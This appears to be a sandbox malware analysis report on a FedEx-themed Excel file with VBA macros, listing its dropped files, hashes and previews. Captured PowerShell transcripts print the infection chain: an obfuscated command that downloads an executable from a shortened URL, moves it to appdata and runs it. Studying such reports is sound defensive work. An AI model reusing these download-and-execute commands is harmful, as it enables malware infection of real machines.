SHA-512:	C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
Malicious:	false
Preview:	PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Users\user\AppData\Local\Temp\o.exe
File Type:	data
Category:	dropped
Size (bytes):	17684
Entropy (8bit):	5.572233031830033
Encrypted:	false
SSDEEP:	384:FtpLGhiwzVA3uh+G127iSBKn+ulUIJ8p7Y9RSJAfXPJWvuYA:khFoG1n4K+ulUo8A/ZAA
MD5:	663FBB7E72638843A4084DECF1FF8DEA
SHA1:	743ADF7BA2F51A3F4EEB48760E05DB93A42ACDFF
SHA-256:	03DE18D2162D09710E0A765AF514C4C3CBB9F02CB35E5F0CB744FD247FA9170A
SHA-512:	55FCCD03EBB1484A853E68266983BAC970FCA50DE89F0C3CFCAD2366980DBBE5E893CE9CA0B34B589AB2E8A822FAD388B93C836B1332D782BCFBC41778186326
Malicious:	false
Preview:	@...e.........................\|.$..._.....P..........@..........H...............<@.^.L."My...:+..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\C0B10000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	52851
Entropy (8bit):	7.845722573410374
Encrypted:	false
SSDEEP:	768:reG8o8mWXbkLwgwE73DFK5Rhdv1nhQgcJPkrTZNpT:aGD8mSb4wjE7zF0Rhdv1hQzMrT3pT
MD5:	1722CBFD72DDAE45F1EF1448D60C37B2
SHA1:	1F8A30FAF59BB3918BB0632917F5F5275F482A00
SHA-256:	2713AEF6FA568DBC80C3287AC933518A21B0DE1FE83805BA860764EA2D001C41
SHA-512:	A3683CFD468B3B34D0417F12036608A8A163C123266FB0741664E9D97499C3F6B2979220B135F5B3CABE8FEE73246FAFE7A01EE9632E3F922EBDB9155E557702
Malicious:	false
Preview:	...N.0.E.H.C.-J.@.5e.e.H.......<ni..q..@}El"...3s3....b...w5.V.V..^i7....Sy..L.)a...m.....b.....E;.Y.R...e.V`..8:..hE..8.A......n....Ke..l<z..X.TL...d..+...eT.D.FK.(Q.r.........\Z..0D....dM..&b\|...0d\|/3.....9.?"..~iv>T.....xEf. ..>tq/...VP.....%....O..S...q.l.....L.:VY!..815@gB........P..i..>....r....hg.~...v...#Q..o...{<.V........k.j..'.*..\|ux......1..............@B....m...;"M....y.)P{..../.......PK..........!.R...............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H.....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a0gfm4ej.1n3.ps1 Download File
Process:	C:\Users\user\AppData\Local\Temp\o.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avhrq2qg.rzu.psm1 Download File
Process:	C:\Users\user\AppData\Local\Temp\o.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npjvw0rs.zxi.psm1 Download File
Process:	C:\Users\user\AppData\Local\Temp\o.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ppytkpfp.dtr.psm1 Download File
Process:	C:\Users\user\AppData\Local\Temp\o.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_shtfsvhw.opz.ps1 Download File
Process:	C:\Users\user\AppData\Local\Temp\o.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xoqj34sn.4ye.ps1 Download File
Process:	C:\Users\user\AppData\Local\Temp\o.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\powershell.exe Download File
Process:	C:\Windows\SysWOW64\Robocopy.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	430592
Entropy (8bit):	5.4944920581701515
Encrypted:	false
SSDEEP:	6144:kaEYqWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqOI:kJW2KXzJ4pdd3klnnWosPhnzq9
MD5:	DBA3E6449E97D4E3DF64527EF7012A10
SHA1:	F66A592D23067C6EFF15356F874E5B61EA4DF4B5
SHA-256:	E0C662D10B852B23F2D8A240AFC82A72B099519FA71CDDF9D5D0F0BE08169B6E
SHA-512:	E447F10E021EEF6C6629962B2EB2148F7073828F4CE2FC1C7FBAD67C300C38EBF022E960CE6BD4AC856A66958B02E00458589CFB5CF0CB87641F33B9FF349B81
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: docCGLRRT67L45F205V.vbs, Detection: malicious, Browse Filename: docBRTNMR51L69G006Q.vbs, Detection: malicious, Browse Filename: Allegato_doc_03141330161.vbs, Detection: malicious, Browse Filename: Allegato_doc_04198100168.vbs, Detection: malicious, Browse Filename: Allegato_doc_03675480267.vbs, Detection: malicious, Browse Filename: Allegato_doc_02044200042.vbs, Detection: malicious, Browse Filename: Allegato_doc_TMSRLL61M43B796B.vbs, Detection: malicious, Browse Filename: Allegato_doc_BRNLSN65H44H501N.vbs, Detection: malicious, Browse Filename: Allegato_doc_03587420286.vbs, Detection: malicious, Browse Filename: Allegato_doc_03455910780.vbs, Detection: malicious, Browse Filename: Allegato_doc_01555200441.vbs, Detection: malicious, Browse Filename: Allegato_doc_07501560150.vbs, Detection: malicious, Browse Filename: Allegato_doc_01578300210.vbs, Detection: malicious, Browse Filename: sload.vbs, Detection: malicious, Browse Filename: sload (2).vbs, Detection: malicious, Browse Filename: Allegato_doc_02298410644.vbs, Detection: malicious, Browse Filename: Allegato.vbs, Detection: malicious, Browse Filename: Fatt_cliente_02567110412.vbs, Detection: malicious, Browse Filename: FattDiffEmessa2020 VNZMSM75H27B201Q.vbs, Detection: malicious, Browse Filename: FattDiffEmessa2020 01170200339.vbs, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4..OU.OU.OU.Q.z.MU.F-z.EU. 1.KU. 1.TU.OU..U. 1.JU. 1.EU. 1.GU. 1..NU. 1.NU.RichOU.........................PE..L...N2..............................0.............@.................................; ....@...... ................................... ...}......................@....4..T...................x........................................................text............................... ..`.data...............................@....idata..............................@..@.rsrc....}... ...~..................@..@.reloc..@...........................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1099008FEDEX_090887766.xls.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:45 2020, mtime=Thu Nov 19 16:31:46 2020, atime=Thu Nov 19 16:31:46 2020, length=75776, window=hide
Category:	dropped
Size (bytes):	2230
Entropy (8bit):	4.653149370351365
Encrypted:	false
SSDEEP:	24:8TqMPjgSFdeGAKWDbwDI77aB6myTqMPjgSFdeGAKWDbwDI77aB6m:8/j9eKWZiB6p/j9eKWZiB6
MD5:	257A2CFEB1B38BBC1DB25FF8CD24DE08
SHA1:	F4374A08219445E6BB7FEFD8E56522E4579F25F5
SHA-256:	ADBE040933A4860F078E0B7CBCB889593CDB09B6D4233A1B051B98092D412809
SHA-512:	7AB3E6704E4084ACDB945B5527D7CA6C092F935EE3190F62BE0255B2016B1F73C89D0478B9D2E685A2C82245FBF861AE4CDB5701A523BA062723BF57873A3ED2
Malicious:	true
Preview:	L..................F.... .......:...&2.....&2......(...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..sQ.....................:.....q\|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny.sQ......S........................h.a.r.d.z.....~.1.....>Qzx..Desktop.h.......Ny.sQ......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....sQ. .109900~1.XLS..f......>QwxsQ.....h.....................6#..1.0.9.9.0.0.8.F.E.D.E.X._.0.9.0.8.8.7.7.6.6...x.l.s.......`...............-......._...........>.S......C:\Users\user\Desktop\1099008FEDEX_090887766.xls..1.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.0.9.9.0.0.8.F.E.D.E.X._.0.9.0.8.8.7.7.6.6...x.l.s.........:..,.LB.)...As...`.......X.......367706...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Thu Nov 19 16:31:46 2020, atime=Thu Nov 19 16:31:46 2020, length=8192, window=hide
Category:	dropped
Size (bytes):	904
Entropy (8bit):	4.634674450896397
Encrypted:	false
SSDEEP:	12:8hBtCXUYcuElPCH2YgSFiYpGuruvA+WrjAZ/2bDkLLC5Lu4t2Y+xIBjKZm:8hLMjgSFnluSAZiDf87aB6m
MD5:	24176C58F48FAA7E3A1037B8FFA6AC81
SHA1:	51592224CA2CB4403FBFD7830849A46F02134DE2
SHA-256:	524A8BFE7E1FBFA1A12BDBA4C1A3F6469264A851F11C2BB95FD93CA154863AE9
SHA-512:	0AF14CD0469BA54CE179D46BAB642CC8B1FE56E81E0B784EDD34E67F75479D9CD16F4C668B9AFA0E0A94785FADD04DD48EF394F01838A0061316933E80E5C37F
Malicious:	false
Preview:	L..................F........N....-..P......&2...... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..sQ.....................:.....q\|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny.sQ......S........................h.a.r.d.z.....~.1.....sQ....Desktop.h.......Ny.sQ.......Y..............>.......%.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......367706...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	131
Entropy (8bit):	4.463054770855908
Encrypted:	false
SSDEEP:	3:oyBVomMMRVGSjiLp2iVGSjiLp2mMMRVGSjiLp2v:dj6i0SjiL90SjiLmi0SjiL2
MD5:	4B6A6073479788E47CDB2B9541380A2F
SHA1:	5F4C24C163B47F613D1CF2110404D0385FE052A5
SHA-256:	9D62BB83F98C890CA7832BDBA451BC0CB70592BF808C237D242BAD0C78A5B0D0
SHA-512:	482944537A4B9D2F26079DD9E4B6CDDFFC70EAE1DD8AB15134BED8D591E457CC3D705E4932B15771CA686DDA5B424B4ED510819D736AEAE6F1A0948E486F1C44
Malicious:	false
Preview:	Desktop.LNK=0..[xls]..1099008FEDEX_090887766.xls.LNK=0..1099008FEDEX_090887766.xls.LNK=0..[xls]..1099008FEDEX_090887766.xls.LNK=0..

C:\Users\user\Desktop\61B10000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	84328
Entropy (8bit):	6.645197213312611
Encrypted:	false
SSDEEP:	1536:UXk3hbdlylKsgqopeJBWhZFGkE+cL2NdHmSb4wIE7zp0RhBv1hQz7rTr1+Xk3hbb:UXk3hbdlylKsgqopeJBWhZFGkE+cL2Nh
MD5:	46039BBAC81FE8A1BFF4B381C0C786DE
SHA1:	58F5D20336F1CE10EEB65D5013D3ED9E409CE5E2
SHA-256:	A581FB978232CA6058F329C12ACB257BC057EBF9A3F7055C2E2AE1E6DCB82FFF
SHA-512:	BA5904CE84626F73264A0248F02A867159CBF30B4AFA5C13E4DD75C3150113ABFF6DEFAF5BADE03247E5AD891E96A416C67AC57B0104760ABA45BAA3580853A1
Malicious:	false
Preview:	........T8..........................\.p....pratesh B.....a.........=...........................................=...h...\:.#8.......X.@...........".......................1................r..A.r.i.a.l.1................r..A.r.i.a.l.1................r..A.r.i.a.l.1................r..A.r.i.a.l.1................r..A.r.i.a.l.1................r..A.r.i.a.l.1................r..A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.

C:\Users\user\Documents\20201119\PowerShell_transcript.367706.GhCrZJKN.20201119093157.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\o.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1006
Entropy (8bit):	5.083836944037601
Encrypted:	false
SSDEEP:	24:BxSAwxvBnJx2DOXJKGWqHjeTKKjX4CIym1ZJX7RnxSAZsvi:BZ0vhJoOZKBqqDYB1ZhlZZOi
MD5:	CE59AFD079451DE08DDAD5E35524608F
SHA1:	EBCE20B643E0715B34E77D44D9C9FD92132910A4
SHA-256:	4E72B7C346016DB061C0827C1C14CB3373B47831223EF2A8BF25A39E9571C84F
SHA-512:	90685286DA43ED84A048F7262C69ADDA07C4BE88A3C7A075F4CFB36119F8AB66FD58DDF4A5ABBA1A49BE89FAF36C30B72BF4DDDD1313917010E2CCC9DEE58C43
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20201119093217..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item vc.exe -Destination $env:appdata..Process ID: 5728..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20201119093217..******************..PS>Start-Sleep 7; Move-Item vc.exe -Destination $env:appdata..******************..Command start time: 20201119093253..******************..PS>$global:?..True..******************..Windows PowerShell transcript end..End time: 20201119093255..****************

C:\Users\user\Documents\20201119\PowerShell_transcript.367706.MJQ4zjyk.20201119093157.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\o.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1062
Entropy (8bit):	5.264034064136681
Encrypted:	false
SSDEEP:	24:BxSAlxvBnJx2DOXJE3eWJHjeTKKjX4CIym1ZJX630nxSAZt:BZ3vhJoOZEZJqDYB1Z4yZZt
MD5:	FEDB7E147DA31DEC575AA72B3F5E764A
SHA1:	058A79F3FCCFB5FE04DA860228CFE60587387A76
SHA-256:	FE36D4C1CDB475167B2B6A33D95272B3C23ABFB78FAFDC6943AD5A1244EA05D6
SHA-512:	44680064BD9772A99AD65452B74E887F985B8A74C718EB5DC210E1BD68C3D1833975F40F44C1BAC3C7C9832FF847E4853E79FAEE17871DB9E52A78B3E9658890
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20201119093218..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')..Process ID: 6036..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20201119093218..******************..PS>(New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')..******************..Command start time: 20201119093252..******************..PS>$global:?..True..********************..Windows PowerShell tran

C:\Users\user\Documents\20201119\PowerShell_transcript.367706.cMeZeq7v.20201119093201.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\o.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	976
Entropy (8bit):	5.078856042808288
Encrypted:	false
SSDEEP:	24:BxSA/xvBnJx2DOXJ1WwHjeTKKjX4CIym1ZJXOYnxSAZR:BZ5vhJoOZcwqDYB1ZZZZR
MD5:	497DFCBBAB62DC2B128C53730CBFAA00
SHA1:	794D4D7D8A68EDC09310B411C57FA31754B82157
SHA-256:	EC6930783B823A6900FA7298A5B0975E3834773C204FD3A200699A5529CBE57B
SHA-512:	9FE32BB7D50912DAE701641EEE1CDD17D115CD17FA488F0B0EE1DD7E505E56C4F8470F0A4153718053C845C424E8BC040E9B2157D73CCB1E7BCB6453D85D568A
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20201119093223..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;..Process ID: 1560..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20201119093224..******************..PS>Start-Sleep 12; cd $env:appdata; ./vc.exe;..******************..Command start time: 20201119093305..******************..PS>$global:?..True..******************..Windows PowerShell transcript end..End time: 20201119093305..********************..

C:\Users\user\Documents\vc.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\o.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	160312
Entropy (8bit):	7.6582344259708695
Encrypted:	false
SSDEEP:	3072:XYhVzakz10URbezAqQF2XcPmSsu/SmwhZ7jL/qz8/kLAQkR5K:iVVRbezcoXeT/wL7jLixzUK
MD5:	BB7C0DFD8ECC7EEBCE937A232608695F
SHA1:	1CCC1FB00E7550C3E0A531E2C0516B741BD26F77
SHA-256:	BE901CFEF8FFF5E7E61DEBEB870EB86D93E84CD458E34D661BC7B0C1103D93BF
SHA-512:	DF6F2AAB574B766CD9AC6FEA092DF79E667B731C8C4CAC34127294C7EBD50CCC9E66F0ECDDBEA0B5BC9A4BCD1999035484C8A30259948AE08BC76B9BB2B23EC3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.._.................H...........f... ........@.. ....................................@..................................f..J....................T..8............................................................ ............... ..H............text....F... ...H.................. ..`.rsrc................J..............@..@.reloc...............R..............@..B.................f......H...........T>......@....+...:..........................................N+.+.(....+.(....+.6.(.....(......>+.+..+.(....+..0..]........,+)+.,..,+&++,. .f.+%+.-.+,&.,.+-{....+).+.(....+..+..+.(U...+.(....+.(....+..+.o....+.....0..v........-.+:.+>,. ..f.+<+A&.-.+A+B .f.+B .....+A+B.o....}.....-..-.(....+.(....+.(U...+.(....+..+.(....+.(U...+..+.(....+....0..I........-.+',.+&{....,.+ {....+..,..,.+.+..,.&&.-..+..+..+.o....+..+..+.(....+.....~......+.......+...(....*

\Device\ConDrv Download File
Process:	C:\Windows\SysWOW64\Robocopy.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	194
Entropy (8bit):	5.024065535765779
Encrypted:	false
SSDEEP:	6:ohpj8WXp+N23fInNq2JS2KFfFjdpp5TpjInn:oTjlAn5KFf/bTjInn
MD5:	FB1FEB60AF5F4BAEEF6DE01B2C04447E
SHA1:	D8DBF120E2871F1661A7BA3F591C2E85724BC010
SHA-256:	7D7DBAFF7CE525336918841033AB6E6F9C5B1DAA04620377ECEE5A7488C83D90
SHA-512:	F636F9B05B6B209AE567680FCDD6628C2CC747C93BBBBBA2E405CAE7B8D7EEFDDB7A5B1D68B611EA7267FB8904861B17E356F640A95BDF6D39B78986A1D6F45B
Malicious:	false
Preview:	C:\Windows\system32\WindowsPowerShell\v1.0\C:\Users\user\AppData\Local\Temp\powershell.exe/DCOPY:DA /COPY:DAT /Z /MT:8 /R:1000000 /W:30 C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: Alexis UZAN, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Sun Oct 11 00:50:35 2020, Security: 1
Entropy (8bit):	6.7883643858765215
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	1099008FEDEX_090887766.xls
File size:	68608
MD5:	069451376c805d4b4d21fdc34a5e58ba
SHA1:	5e8897fa3ee53ac8a1f010e01ea4ec5c2b3dbed5
SHA256:	dc2be755822676a5ec7e406876c100efaf4983272e57a52469d5f0f788f55b82
SHA512:	b05d54fb806cfa391e78871328659319824481dcf522a8a1a18067c6c702460fb8650dd603f8d91e1123ef9836406c2fdddc48f38048c8ca1da6a77983f750ec
SSDEEP:	1536:eknSGiysRchNXHfA1MiWhZFGkEld+Dr7e7mSb4wIE7zp0RhBv1hQz7rT01R:eknSGiysRchNXHfA1MiWhZFGkEld+Drj
File Content Preview:	........................;......................................................................................................................................................................................................................................

File Icon


Icon Hash:	74ecd4c6c3c6c4d8

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "1099008FEDEX_090887766.xls"

Indicators
Has Summary Info:	True
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Last Saved By:	Alexis UZAN
Create Time:	2020-09-20 21:17:44
Last Saved Time:	2020-10-10 23:50:35
Security:	1

Document Summary
Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	276
Entropy:	3.16930549839
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . . . F e u i l l e s d e c a l c u l . . . . . . . . . . . . . . . . . M a c r o
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 98 00 00 00 02 00 00 00 e4 04 00 00

